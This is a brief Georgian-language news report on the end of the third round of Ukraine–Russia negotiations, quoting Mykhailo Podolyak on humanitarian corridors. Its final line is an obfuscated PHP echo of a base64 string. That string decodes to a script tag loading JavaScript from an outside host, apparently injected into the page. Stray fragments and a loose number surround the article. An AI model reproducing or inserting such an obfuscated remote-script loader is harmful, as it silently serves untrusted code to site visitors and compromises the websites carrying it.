celsiusi
ავერსი შნაიდერი
უკრაინა-რუსეთს შორის მოლაპარაკების მესამე რაუნდი დასრულდა - ამის შესახებ ინფორმაციას ბელარუსში რუსეთის საელჩო ავრცელებს.
 
ჯერჯერობით უცნობია, მიაღწიეს თუ არა მხარეებმა რაიმე შეთანხმებას.
 
განახლება: 
 
უკრაინა - რუსეთის დელეგაციებს შორის მოლაპარაკებების მესამე რაუნდი დასრულდა.
 
უკრაინული მხარის განცხადებით, გარკვეული ცვლილებები არის, თუმცა შედეგი, რომელიც უკრაინაში არსებულ მდგომარეობას საგრძნობლად გააუმჯობესებს, ჯერჯერობით არ არის.
 
უკრაინის პრეზიდენტის ოფისის ხელმძღვანელმა, მიხაილ პოდოლიაკმა თქვა, რომ რუსეთთან მოლაპარაკებებზე შეთანხმდნენ, რომ „რაღაც შეთანხმებამდე მისვლას" ეცდებიან.
 
„ლოჯისტიკისა და ჰუმანიტარულ დერეფნებთან დაკავშირებით გარკვეული ცვლილებები გვაქვს. რაც შეეხება პოლიტიკურ ნაწილს, ამჯერად შევთანხმდით, რომ რაღაც შეთანხმებამდე მისვლას ვეცდებით. ის შედეგი, რომელიც უკრაინაში არსებულ მდგომარეობას საგრძნობლად გააუმჯობესებს, ჯერჯერობით არ გვაქვს“, - განაცხადა მიხაილ პოდოლიაკმა.
876
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");